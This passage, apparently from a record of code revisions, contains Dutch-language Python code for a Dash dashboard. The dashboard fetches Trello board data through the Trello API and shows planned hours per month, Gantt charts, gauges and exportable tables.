'urenperperiode': {i: (0) for i in arrays['perioden']}} for\n kaart in kaarten.values()}\n except:\n urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],\n 'Leden': kaart['Leden'], 'Aangemaakt': kaart['Aangemaakt'],\n 'Epic': kaart['Epic'], 'shortUrl': kaart['shortUrl'], config.\n get('Custom Field for Starting date'): kaart[config.get(\n 'Custom Field for Starting date')], config.get(\n 'Custom Field for Ending date'): kaart[config.get(\n 'Custom Field for Ending date')], config.get(\n 'Custom Field for Person'): kaart[config.get(\n 'Custom Field for Person')], config.get(\n 'Custom Field for Categories'): kaart[config.get(\n 'Custom Field for Categories')], config.get(\n 'Custom Field with hours'): kaart[config.get(\n 'Custom Field with hours')], 'Lijst': kaart['Lijst'], 'Status':\n kaart['Status'], 'urenperdag': {i: (0) for i in dates},\n 'urenperperiode': {i: (0) for i in arrays['perioden']}} for\n kaart in kaarten.values()}\n beschikbareuren = {key: {'urenperdag': {i: (0) for i in dates},\n 'urenperperiode': {i: (0) for i in arrays['perioden']}} for key in\n hours.keys()}\n for i in dates:\n datekey = datetime.strptime(i, '%Y-%m-%d').date()\n for k, l in kaarten.items():\n if l['Niet meenemen in telling'] != True:\n try:\n if l[config.get('Custom Field for Starting date')].date(\n ) < datekey <= l[config.get(\n 'Custom Field for Ending date')].date():\n delta = l[config.get('Custom Field for Ending date')\n ] - l[config.get('Custom Field for Starting date')]\n hoursperday = int(l[config.get(\n 'Custom Field with hours')]) / int(delta.days)\n urenperdagperkaart[l['Naam']]['urenperdag'][i\n ] = hoursperday\n except:\n pass\n for k, l in hours.items():\n try:\n if l[config.get('Custom Field for Starting date')].date(\n ) < datekey <= l[config.get('Custom Field for Ending date')\n ].date():\n hoursperday = int(l[config.get('Custom Field with hours')]\n ) / int(30.4)\n beschikbareuren[k]['urenperdag'][i] = hoursperday\n except:\n pass\n for i, j in 
urenperdagperkaart.items():\n for k, l in j['urenperdag'].items():\n for m in j['urenperperiode'].keys():\n if m == k[0:4] + k[5:7]:\n j['urenperperiode'][m] += l\n for i, j in beschikbareuren.items():\n for k, l in j['urenperdag'].items():\n for m in j['urenperperiode'].keys():\n if m == k[0:4] + k[5:7]:\n j['urenperperiode'][m] += l\n dfurenpermaand = copy.deepcopy(urenperdagperkaart)\n for i, j in dfurenpermaand.items():\n try:\n j['Geplande uren'] = int(j['Geplande uren'])\n except:\n j['Geplande uren'] = 0\n for k, l in j['urenperperiode'].items():\n j[k] = round(l, 2)\n del j['urenperperiode']\n bars = []\n labelsnietingepland = []\n for j in kaarten.values():\n if j[config.get('Custom Field for Starting date')] == None and j[config\n .get('Custom Field for Ending date')] == None and j[config.get(\n 'Custom Field with hours')] != None and j['Status'\n ] == 'Niet gestart':\n labelsnietingepland.append(j['Lijst'])\n labelsnietingepland = list(dict.fromkeys(labelsnietingepland))\n for i, j in kaarten.items():\n if j[config.get('Custom Field for Starting date')] == None and j[config\n .get('Custom Field for Ending date')] == None and j[config.get(\n 'Custom Field with hours')] != None and j['Status'\n ] == 'Niet gestart':\n tmp = []\n for label in labelsnietingepland:\n if j['Lijst'] == label:\n tmp.append(int(j['Geplande uren']))\n else:\n tmp.append(0)\n bars.append(dict(x=labelsnietingepland, y=tmp, name=j['Naam'],\n type='bar', opacity='0.6'))\n epicbars = []\n tmpepicsforbarchart = {epic: (0) for epic in [name['Naam'] for name in\n kaarten.values() if name['Status'] in ['Epics Doing', 'Epics Done']]}\n tmpepicsforbarchart['Geen epic'] = 0\n for i, j in kaarten.items():\n if j[config.get('Custom Field for Starting date')] == None and j[config\n .get('Custom Field for Ending date')] == None and j[config.get(\n 'Custom Field with hours')] != None and j['Status'\n ] == 'Niet gestart':\n tmpepicsforbarchart[j['Epic']] += int(j[config.get(\n 'Custom Field with 
hours')])\n epicsforbarchart = {k: v for k, v in tmpepicsforbarchart.items() if v != 0}\n epicbars.append(dict(x=[key for key in epicsforbarchart.keys()], y=[\n value for value in epicsforbarchart.values()], type='bar', text=[\n value for value in epicsforbarchart.values()], textposition=\n 'outside', opacity='0.6'))\n thismonth = datetime.strftime(datetime.now(), '%Y%m')\n nextmonth = (datetime.now() + relativedelta(months=1)).strftime('%Y%m')\n twomonths = (datetime.now() + relativedelta(months=2)).strftime('%Y%m')\n arrays['threemonths'] = [(thismonth, datetime.strptime(thismonth,\n '%Y%m').strftime('%B')), (nextmonth, datetime.strptime(nextmonth,\n '%Y%m').strftime('%B')), (twomonths, datetime.strptime(twomonths,\n '%Y%m').strftime('%B'))]\n gaugegeplandthismonth = round(sum([value for card in urenperdagperkaart\n .values() for keys, value in card['urenperperiode'].items() if keys ==\n thismonth]))\n gaugegeplandnextmonth = round(sum([value for card in urenperdagperkaart\n .values() for keys, value in card['urenperperiode'].items() if keys ==\n nextmonth]))\n gaugegeplandtwomonths = round(sum([value for card in urenperdagperkaart\n .values() for keys, value in card['urenperperiode'].items() if keys ==\n twomonths]))\n deltathismonth = round(sum([value for card in beschikbareuren.values() for\n keys, value in card['urenperperiode'].items() if keys == thismonth]))\n deltanextmonth = round(sum([value for card in beschikbareuren.values() for\n keys, value in card['urenperperiode'].items() if keys == nextmonth]))\n deltatwomonths = round(sum([value for card in beschikbareuren.values() for\n keys, value in card['urenperperiode'].items() if keys == twomonths]))\n if deltathismonth > gaugegeplandthismonth:\n gaugerangethismonth = deltathismonth + 20\n else:\n gaugerangethismonth = gaugegeplandthismonth + 20\n if deltanextmonth > gaugegeplandnextmonth:\n gaugerangenextmonth = deltanextmonth + 20\n else:\n gaugerangenextmonth = gaugegeplandnextmonth + 20\n if 
deltatwomonths > gaugegeplandtwomonths:\n gaugerangetwomonths = deltatwomonths + 20\n else:\n gaugerangetwomonths = gaugegeplandtwomonths + 20\n gaugestepsthismonth = {'axis': {'range': [None, gaugerangethismonth]},\n 'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltathismonth *\n 0.5], 'color': '#3deb34'}, {'range': [deltathismonth * 0.5, \n deltathismonth * 0.75], 'color': '#b4eb34'}, {'range': [\n deltathismonth * 0.75, deltathismonth * 0.9], 'color': '#ebb434'},\n {'range': [deltathismonth * 0.9, deltathismonth], 'color':\n '#eb6e34'}, {'range': [deltathismonth, gaugerangethismonth],\n 'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',\n 'width': 4}, 'thickness': 0.75, 'value': deltathismonth}}\n gaugestepsnextmonth = {'axis': {'range': [None, gaugerangenextmonth]},\n 'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltanextmonth *\n 0.5], 'color': '#3deb34'}, {'range': [deltanextmonth * 0.5, \n deltanextmonth * 0.75], 'color': '#b4eb34'}, {'range': [\n deltanextmonth * 0.75, deltanextmonth * 0.9], 'color': '#ebb434'},\n {'range': [deltanextmonth * 0.9, deltanextmonth], 'color':\n '#eb6e34'}, {'range': [deltanextmonth, gaugerangenextmonth],\n 'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',\n 'width': 4}, 'thickness': 0.75, 'value': deltanextmonth}}\n gaugestepstwomonths = {'axis': {'range': [None, gaugerangetwomonths]},\n 'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltatwomonths *\n 0.5], 'color': '#3deb34'}, {'range': [deltatwomonths * 0.5, \n deltatwomonths * 0.75], 'color': '#b4eb34'}, {'range': [\n deltatwomonths * 0.75, deltatwomonths * 0.9], 'color': '#ebb434'},\n {'range': [deltatwomonths * 0.9, deltatwomonths], 'color':\n '#eb6e34'}, {'range': [deltatwomonths, gaugerangetwomonths],\n 'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',\n 'width': 4}, 'thickness': 0.75, 'value': deltatwomonths}}\n gaugefig = go.Figure()\n gaugefig.add_trace(go.Indicator(domain={'x': [0, 0.3], 'y': [0, 
1]},\n value=gaugegeplandthismonth, mode='gauge+number+delta', title={\n 'text': 'Totale uren voor ' + datetime.strptime(thismonth, '%Y%m').\n strftime('%B')}, delta={'reference': deltathismonth}, gauge=\n gaugestepsthismonth))\n gaugefig.add_trace(go.Indicator(domain={'x': [0.35, 0.65], 'y': [0, 1]},\n value=gaugegeplandnextmonth, mode='gauge+number+delta', title={\n 'text': 'Totale uren voor ' + datetime.strptime(nextmonth, '%Y%m').\n strftime('%B')}, delta={'reference': deltanextmonth}, gauge=\n gaugestepsnextmonth))\n gaugefig.add_trace(go.Indicator(domain={'x': [0.7, 1], 'y': [0, 1]},\n value=gaugegeplandtwomonths, mode='gauge+number+delta', title={\n 'text': 'Totale uren voor ' + datetime.strptime(twomonths, '%Y%m').\n strftime('%B')}, delta={'reference': deltatwomonths}, gauge=\n gaugestepstwomonths))\n gaugefig.update_layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n graphdata = {'nietingepland': bars, 'nietingeplandepics': epicbars,\n 'gaugefig': gaugefig}\n columntypes = {}\n for key, value in kaarten[next(iter(kaarten))].items():\n if 'datum' in key or key == 'Aangemaakt':\n columntypes[key] = 'datetime'\n elif type(value) == int:\n columntypes[key] = 'numeric'\n elif type(value in [str, bool]):\n columntypes[key] = 'text'\n columntypesurenpermaand = dict(columntypes)\n columntypesurenpermaand.update({i: 'text' for i in arrays['perioden']})\n data = {'kaarten': kaarten, 'arrays': arrays, 'urenperdagperkaart':\n urenperdagperkaart, 'beschikbareuren': beschikbareuren, 'graphdata':\n graphdata, 'dfs': {'kaartendf': pd.DataFrame(data=kaarten).T,\n 'columntypes': columntypes, 'urenpermaand': pd.DataFrame(data=\n dfurenpermaand).T, 'columntypesurenpermaand': columntypesurenpermaand}}\n\n\ndef make_layout():\n return html.Div(className='First Div', children=[html.Div(style={\n 'font-style': 'italic', 'font-weight': 'bold', 'border': '10px',\n 'box-shadow': '8px 8px 8px grey', 'background': 'rgb(149,193,31)',\n 'background':\n 
'linear-gradient(133deg, rgba(62,182,235,1) 0%, rgba(243,253,255,1) 76%, rgba(243,253,255,0) 100%)'\n , 'margin-top': '1%', 'margin-bottom': '1%', 'margin-right': '1%',\n 'margin-left': '1%', 'border-radius': '10px', 'text-align':\n 'center'}, className='Banner', children=[html.Div(style={'display':\n 'inline-block', 'width': '80%'}, children=[html.H1(\n 'Trello borden USD')]), html.Div(style={'display': 'inline-block',\n 'margin-right': '1px'}, children=[html.Img(src=app.get_asset_url(\n 'logonop.png'), style={'width': '150px', 'margin-right': '0px'})])]\n ), html.H5('Kies hieronder een bord', style={'text-align': 'center'\n }), dcc.Dropdown(id='dropdown_boards', options=[{'label': i['name'],\n 'value': i['id']} for i in boards], value=boards[0]['id']), html.\n Button('Data verversen', id='refreshdatabtn', n_clicks=0), html.Div\n (id='test')])\n\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\nexternal_scripts = ['https://cdn.plot.ly/plotly-locale-nl-latest.js']\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets,\n external_scripts=external_scripts, url_base_pathname='/dash/')\napp.layout = make_layout\napp.config['suppress_callback_exceptions'] = True\n\n\n@app.callback(Output('test', 'children'), [Input('dropdown_boards', 'value'\n ), Input('refreshdatabtn', 'n_clicks')])\ndef create_maindiv(value, n_clicks):\n get_data(value)\n import os\n if os.name == 'nt':\n daterefreshed = datetime.strftime(datetime.now(), '%A %d %b, %H:%M')\n else:\n daterefreshed = datetime.strftime(datetime.now(), '%A %-d %B, %H:%M')\n return html.Div(className='', children=[dcc.Markdown(\n '**Laatst ververst: **' + daterefreshed), dcc.Tabs(className='Tabs',\n children=[dcc.Tab(label='Gantt charts', style=globals['styles'][\n 'tabs'], children=[html.Div(className='tab2_div1', style=globals[\n 'styles']['maindivs'], children=[html.H3('Uitleg'), html.Div(style=\n globals['styles']['divgraphs'], children=[dcc.Markdown(\n 'In dit tabblad worden de 
kaarten in GANTT charts weergegeven. Kies in de dropdown voor welke epic de kaarten moeten worden weergegeven.'\n )])]), html.Div(className='tab2_div2', style=globals['styles'][\n 'maindivs'], children=[html.H4('Gantt per epic'), dcc.Dropdown(\n style=globals['styles']['dropdowns'], id='dropdownganttepics',\n options=[{'label': name, 'value': name} for name in data['arrays'][\n 'epics']], value=[next(iter(data['arrays']['epics']))]), html.Div(\n style=globals['styles']['divgraphs'], children=[dcc.Graph(id=\n 'ganttepics')])]), html.Div(className='tab2_div3', style=globals[\n 'styles']['maindivs'], children=[html.H4('Gantt per persoon'), dcc.\n Dropdown(style=globals['styles']['dropdowns'], id=\n 'dropdownganttpersoon', options=[{'label': name, 'value': name} for\n name in data['arrays'][config.get('Custom Field for Person')]]),\n dcc.Dropdown(style=globals['styles']['dropdowns'], id=\n 'dropdownganttpersoonstatus', options=[{'label': name, 'value':\n name} for name in data['arrays']['statuses']], value=data['arrays']\n ['statuses'], multi=True), html.Div(style=globals['styles'][\n 'divgraphs'], children=[dcc.Graph(id='ganttpersoon')])])]), dcc.Tab\n (label='Data export', style=globals['styles']['tabs'], children=[\n html.Div(className='tab3_div1', style=globals['styles']['maindivs'],\n children=[html.H3('Uitleg'), html.Div(style=globals['styles'][\n 'divgraphs'], children=[dcc.Markdown(\n \"Hieronder kan de data worden geëxporteerd. Via de buttons 'Export' downloadt je een excelbestand.\"\n ), dcc.Markdown(\n \"In het dashboard kun je met de knop 'Toggle columns' ook velden zichtbaar maken, om van tevoren te filteren. 
Kies dan de velden, filter daarna en klik op 'Export'.\"\n )])]), html.Div(className='tab3_div2', style=globals['styles'][\n 'maindivs'], children=[html.H4('Platte dump'), dcc.Markdown(\n 'Deze tabel laat de platte data zien, zoals in Trello gevuld.'),\n dash_table.DataTable(id='table_plattedump', columns=[{'name': i,\n 'id': i, 'type': data['dfs']['columntypes'].get(i), 'hideable': \n True} for i in data['dfs']['kaartendf'].columns if i in data['dfs']\n ['columntypes'].keys()], data=data['dfs']['kaartendf'].to_dict(\n 'records'), hidden_columns=[i for i in data['dfs']['columntypes']],\n export_format='xlsx', export_headers='display', export_columns=\n 'all', filter_action='native', sort_action='native', sort_mode=\n 'multi', style_table={'overflowX': 'scroll'}, style_header={\n 'backgroundColor': 'rgba(62,182,235,0.6)', 'color': 'black',\n 'fontWeight': 'bold', 'fontFamily': 'Arial'}, style_cell={\n 'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black',\n 'text-align': 'left', 'fontFamily': 'Arial', 'height': 'auto'})]),\n html.Div(className='tab3_div3', style=globals['styles']['maindivs'],\n children=[html.H4('Uren per maand'), dcc.Markdown(\n 'Hieronder kan een export gemaakt worden van de uren zoals ze per maand zijn ingepland.'\n ), dcc.Markdown(\n 'Ook hierin kan gefilterd worden. 
filter bijvoorbeeld in de maand naar keuze op >0 om alle kaarten die geen ingeplande uren hebben niet te tonen.'\n ), dash_table.DataTable(id='table_urenpermaand', columns=[{'name':\n i, 'id': i, 'type': data['dfs']['columntypesurenpermaand'].get(i),\n 'hideable': True} for i in data['dfs']['urenpermaand'].columns if i in\n data['dfs']['columntypesurenpermaand'].keys()], data=data['dfs'][\n 'urenpermaand'].to_dict('records'), hidden_columns=[i for i in data\n ['dfs']['columntypesurenpermaand']], export_format='xlsx',\n export_headers='display', export_columns='all', filter_action=\n 'native', sort_action='native', sort_mode='multi', style_header={\n 'backgroundColor': 'rgba(62,182,235,0.6)', 'color': 'black',\n 'fontWeight': 'bold', 'fontFamily': 'Arial'}, style_cell={\n 'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black',\n 'text-align': 'left', 'fontFamily': 'Arial'})])]), dcc.Tab(label=\n 'Langetermijnplanning', style=globals['styles']['tabs'], children=[\n html.Div(className='maindivs', style=globals['styles']['maindivs'],\n children=[html.H3('Uitleg'), html.Div(style=globals['styles'][\n 'divgraphs'], children=[dcc.Markdown(\n 'In dit tabblad wordt een langetermijnplanning getoond.'), dcc.\n Markdown('De focus hierbij ligt vooral op de categorieen.')])]),\n html.Div(className='maindivs', style=globals['styles']['maindivs'],\n children=[html.H4('Ingeplande uren per categorie'), dcc.Dropdown(\n style=globals['styles']['dropdowns'], id='dropdownurenpermaand',\n options=[{'label': name, 'value': name} for name in data['arrays'][\n config.get('Custom Field for Categories')] if name != None], multi=\n True, searchable=False, value=data['arrays'][config.get(\n 'Custom Field for Categories')]), html.Div(style=globals['styles'][\n 'divgraphs'], children=[dcc.Graph(id='urenpermaand')])]), html.Div(\n className='tab1_div3', style=globals['styles']['maindivs'],\n children=[html.H4('Nog in te plannen uren (per lijst)'), dcc.\n Markdown(\n '*Nieuw* zijn 
werkzaamheden die **nog niet** zijn besproken of ze worden gedaan.'\n ), dcc.Markdown(\n '*Wensenlijst* zijn werkzaamheden die **wel** zijn besproken, maar **geen prioriteit** hebben.'\n ), dcc.Markdown(\n '*Inplannen* zijn werkzaamheden die **moeten** gebeuren.'), dcc.\n Markdown(\n '**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'\n ), html.Div(style=globals['styles']['divgraphs'], children=[dcc.\n Graph(id='graph_nietingepland', figure={'data': data['graphdata'][\n 'nietingepland'], 'layout': globals['graphlayouts']['bars']})])]),\n html.Div(className='tab1_div4', style=globals['styles']['maindivs'],\n children=[html.H4('Nog in te plannen uren (per epic)'), dcc.\n Markdown(\n '**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'\n ), html.Div(style=globals['styles']['divgraphs'], children=[dcc.\n Graph(id='graph_nietingepland_epics', figure={'data': data[\n 'graphdata']['nietingeplandepics'], 'layout': globals[\n 'graphlayouts']['bars']})])])]), dcc.Tab(style=globals['styles'][\n 'tabs'], label='Tactische planning', children=[html.Div(className=\n 'maindivs', style=globals['styles']['maindivs'], children=[html.H3(\n 'Uitleg'), dcc.Markdown(\n 'In dit tabblad is een middellange termijnplanning te zien.')]),\n html.Div(className='maindivs', style=globals['styles']['maindivs'],\n children=[html.H4('Totalen'), dcc.Markdown(\n 'Hieronder staan twee totaaloverzichten van de aankomende maanden.'\n ), dcc.Markdown(\n 'De blauwe balk geeft de ingeplande uren weer. 
De streep geeft de beschikbare uren aan.'\n ), dcc.Markdown(\n 'Het kleine getal eronder geeft aan hoeveel uren tekort/over zijn voor die maand.'\n ), html.Div(style=globals['styles']['divgraphs'], children=[dcc.\n Graph(figure=data['graphdata']['gaugefig'])])]), html.Div(className\n ='maindivs', style=globals['styles']['maindivs'], children=[html.H4\n ('Gantt'), dcc.Dropdown(style=globals['styles']['dropdowns'], id=\n 'dropdowngantttactisch', options=[{'label': j, 'value': i} for i, j in\n data['arrays']['threemonths']], multi=False, searchable=False,\n value=data['arrays']['threemonths'][0][0]), html.Div(style=globals[\n 'styles']['divgraphs'], children=[dcc.Graph(id='gantttactisch')])])\n ])])])\n\n\n@app.callback(Output('gantttactisch', 'figure'), [Input(\n 'dropdowngantttactisch', 'value')])\ndef update_gantttactisch(v1):\n if v1 != None:\n if v1[4:] == '12':\n v1plus1 = str(int(v1[0:4]) + 1) + '01'\n else:\n v1plus1 = str(int(v1) + 1)\n if v1[4:] == '01':\n v1min1 = str(int(v1[0:4]) - 1) + '12'\n else:\n v1min1 = str(int(v1) - 1)\n if v1[4:] == '11':\n v1plus2 = str(int(v1[0:4]) + 1) + '01'\n else:\n v1plus2 = str(int(v1) + 2)\n import random\n import numpy as np\n from operator import itemgetter\n ganttdata = []\n monthkey = int(v1)\n for i, j in data['kaarten'].items():\n if j['Status'] in ['Niet gestart', 'Doing', 'Blocked']:\n try:\n if int(datetime.strftime(j['Begindatum'], '%Y%m')\n ) <= monthkey and int(datetime.strftime(j[\n 'Einddatum'], '%Y%m')) >= monthkey:\n if j['Begindatum'].date() < datetime.strptime(\n v1min1 + '01', '%Y%m%d').date():\n start = datetime.strptime(v1min1 + '01', '%Y%m%d'\n ).date()\n else:\n start = j['Begindatum'].date()\n if j['Einddatum'].date() >= datetime.strptime(\n v1plus2 + '01', '%Y%m%d').date():\n eind = datetime.strptime(v1plus2 + '01', '%Y%m%d'\n ).date()\n else:\n eind = j['Einddatum'].date()\n ganttdata.append(dict(Task=j['Epic'], Start=start,\n Finish=eind, Resource=j['Naam'] + ' (uren: ' +\n 
str(round(data['urenperdagperkaart'][j['Naam']]\n ['urenperperiode'][v1])) + ')'))\n except:\n pass\n result = sorted(ganttdata, key=itemgetter('Task'))\n rgb = []\n for c in range(len(result)):\n r = list(np.random.choice(range(256), size=3))\n s2 = ','.join(map(str, r))\n s1 = 'rgb('\n s3 = ')'\n rgb.append(s1 + s2 + s3)\n fig = ff.create_gantt(result, index_col='Resource', show_colorbar=\n True, group_tasks=False, showgrid_x=True, showgrid_y=True,\n colors=rgb)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n fig.add_trace(go.Scatter(mode='lines', x=[v1[0:4] + '-' + v1[4:] +\n '-01', v1[0:4] + '-' + v1[4:] + '-01'], y=[-1, len(result)],\n line={'shape': 'spline', 'color': 'black', 'width': 4},\n showlegend=False))\n fig.add_trace(go.Scatter(mode='lines', x=[v1plus1[0:4] + '-' +\n v1plus1[4:] + '-01', v1plus1[0:4] + '-' + v1plus1[4:] + '-01'],\n y=[-1, len(result)], line={'shape': 'spline', 'color': 'black',\n 'width': 4}, showlegend=False))\n return fig\n else:\n return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=\n 'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n@app.callback(Output('ganttpersoon', 'figure'), [Input(\n 'dropdownganttpersoon', 'value'), Input('dropdownganttpersoonstatus',\n 'value')])\ndef update_ganttpersoon(v1, v2):\n ganttdata = []\n for i, j in data['kaarten'].items():\n if j[config.get('Custom Field for Person')] == v1 and j['Status'\n ] != 'Archived' and j['Status'] in v2:\n try:\n ganttdata.append(dict(Task=j['Naam'], Start=j[config.get(\n 'Custom Field for Starting date')].date(), Finish=j[\n config.get('Custom Field for Ending date')].date(),\n Resource=j['Epic']))\n except:\n pass\n if ganttdata != []:\n fig = ff.create_gantt(ganttdata, index_col='Resource',\n show_colorbar=True, showgrid_x=True, showgrid_y=True)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n return fig\n else:\n return {'data': [go.Pie()], 'layout': 
go.Layout(paper_bgcolor=\n 'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n@app.callback(Output('ganttepics', 'figure'), [Input('dropdownganttepics',\n 'value')])\ndef update_ganttepics(value):\n ganttdata = []\n for i, j in data['kaarten'].items():\n if j['Epic'] == value and j['Status'] != 'Archived':\n try:\n ganttdata.append(dict(Task=j['Naam'], Start=j[config.get(\n 'Custom Field for Starting date')].date(), Finish=j[\n config.get('Custom Field for Ending date')].date(),\n Resource=j['Status']))\n except:\n pass\n if ganttdata != []:\n fig = ff.create_gantt(ganttdata, index_col='Resource',\n show_colorbar=True, showgrid_x=True, showgrid_y=True)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n return fig\n else:\n return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=\n 'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n@app.callback(Output('urenpermaand', 'figure'), [Input(\n 'dropdownurenpermaand', 'value')])\ndef update_urenpermaand(value):\n layout = go.Layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)', xaxis={'title': 'Datum', 'gridcolor': 'gray'},\n yaxis={'title': 'Ingeplande uren', 'gridcolor': 'gray'})\n bars = []\n if 'Regulier werk' in value:\n yaxis = []\n for i in data['arrays']['perioden']:\n yaxis.append(round(sum([value['urenperperiode'][i] for value in\n data['urenperdagperkaart'].values() if value[config.get(\n 'Custom Field for Categories')] == 'Regulier werk']), 0))\n bars.append(dict(x=data['arrays']['xaxis_months'], y=yaxis, name=\n 'Regulier werk', line={'shape': 'spline', 'smoothing': 0.4},\n mode='lines+markers', marker={'symbol': 'triangle-up-open',\n 'size': 10}, stackgroup='one'))\n for categorie in data['arrays'][config.get('Custom Field for Categories')]:\n if categorie in value and categorie != 'Regulier werk':\n if categorie == None:\n categorienaam = 'Geen categorie'\n else:\n categorienaam = categorie\n yaxis = []\n for i in data['arrays']['perioden']:\n 
yaxis.append(round(sum([value['urenperperiode'][i] for\n value in data['urenperdagperkaart'].values() if value[\n config.get('Custom Field for Categories')] == categorie\n ]), 0))\n bars.append(dict(x=data['arrays']['xaxis_months'], y=yaxis,\n name=categorienaam, line={'shape': 'spline', 'smoothing': \n 0.4}, mode='lines+markers', marker={'symbol':\n 'triangle-up-open', 'size': 10}, stackgroup='one'))\n yaxis = []\n for i in data['arrays']['perioden']:\n yaxis.append(round(sum([value['urenperperiode'][i] for value in\n data['beschikbareuren'].values()]), 0))\n bars.append(dict(name='Totaal beschikbare uren', mode='lines', x=data[\n 'arrays']['xaxis_months'], y=yaxis, size=10, line={'shape':\n 'spline', 'smoothing': 0.3, 'width': 6, 'color': 'black'}))\n return {'data': bars, 'layout': layout}\n\n\n@app.server.route('/dash/configuration/')\ndef download_file():\n return flask.send_file('./configuration/configuration.txt',\n attachment_filename='configuration.txt', as_attachment=True,\n cache_timeout=0)\n\n\nif __name__ == '__main__':\n app.run_server(debug=False, host='0.0.0.0', port=8050)\n",
"step-4": "import os, json, locale, requests, dash, dash_table, copy, time, flask, base64\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objects as go\nimport pandas as pd\nfrom os import listdir\nimport plotly.figure_factory as ff\nfrom concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor\nfrom dash.dependencies import Input, Output\nfrom datetime import date, datetime, timedelta, time\nfrom dateutil.relativedelta import relativedelta\ntry:\n with open('./configuration/credentials.txt') as json_file:\n credentials = json.load(json_file)\n with open('./configuration/configuration.txt') as json_file:\n config = json.load(json_file)\nexcept:\n raise Exception('Draai eerst deploy.py!')\nlocale = locale.setlocale(locale.LC_ALL, 'nl_NL.UTF-8')\nglobals = {'config': config, 'credentials': credentials, 'styles': {}}\nboard_url = ('https://api.trello.com/1/members/me/boards?fields=name&key=' +\n credentials.get('API key') + '&token=' + credentials.get('API token'))\nboards = json.loads(json.dumps(requests.get(board_url).json()))\nglobals['boards'] = boards\nglobals['styles']['maindivs'] = {'box-shadow': '8px 8px 8px grey',\n 'background-image': \"url('./assets/left.png')\", 'background-repeat':\n 'no-repeat', 'background-position': '0px 0px', 'margin-top': '1%',\n 'margin-bottom': '1%', 'margin-left': '1%', 'margin-right': '1%',\n 'text-align': 'center', 'border-radius': '10px'}\nglobals['styles']['tabs'] = {'border-style': 'solid', 'border-width': '2px',\n 'background': 'rgb(255,255,255)', 'background':\n 'radial-gradient(circle, rgba(255,255,255,1) 0%, rgba(162,162,162,1) 100%, rgba(255,255,255,1) 100%)'\n , 'margin-top': '5px', 'margin-bottom': '5px', 'margin-right': '5px',\n 'margin-left': '5px', 'border-radius': '6px'}\nglobals['styles']['divgraphs'] = {'background-color':\n 'rgba(62,182,235,0.1)', 'margin-top': '1%', 'margin-bottom': '2%',\n 'margin-left': '1%', 'margin-right': '1%', 'text-align': 
'center',\n 'border-radius': '10px'}\nglobals['styles']['dropdowns'] = {'margin-left': '1%', 'margin-right': '2%'}\nglobals['graphlayouts'] = {'bars': go.Layout(barmode='stack', paper_bgcolor\n ='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)', hovermode='closest')}\n\n\ndef get_data(value):\n global data\n global config\n with open('./configuration/configuration.txt') as json_file:\n configfile = json.load(json_file)\n config = configfile.get(value)\n keys = 'key=' + credentials.get('API key') + '&token=' + credentials.get(\n 'API token')\n trello_base_url = 'https://api.trello.com/1/'\n board_url = trello_base_url + 'boards/' + value\n url_cards = (board_url +\n '?cards=all&card_pluginData=true&card_attachments=true&card_customFieldItems=true&filter=all&'\n + keys)\n url_lists = board_url + '/lists?filter=all&' + keys\n url_customfields = board_url + '/customFields?' + keys\n url_labels = board_url + '/labels?' + keys\n url_members = board_url + '/members?' + keys\n board = json.loads(json.dumps(requests.get(url_cards).json()))\n lists = json.loads(json.dumps(requests.get(url_lists).json()))\n customfields = json.loads(json.dumps(requests.get(url_customfields).json())\n )\n labels = json.loads(json.dumps(requests.get(url_labels).json()))\n members = json.loads(json.dumps(requests.get(url_members).json()))\n cards = board['cards']\n\n def dateCalc(date):\n try:\n newdate = datetime.strptime(date[0:19], '%Y-%m-%dT%H:%M:%S')\n return newdate\n except:\n return None\n customfields_dict = {'date': {}, 'list': {}, 'text': {}, 'number': {},\n 'checkbox': {}}\n for i in customfields:\n customfields_dict[i['type']] = {}\n for i in customfields:\n customfields_dict[i['type']][i['id']] = {}\n for i in customfields:\n if i['type'] == 'list':\n customfields_dict[i['type']][i['id']]['name'] = i['name']\n customfields_dict['list'][i['id']]['options'] = {}\n for j in i['options']:\n customfields_dict['list'][i['id']]['options'][j['id']] = j[\n 'value'].get('text')\n else:\n 
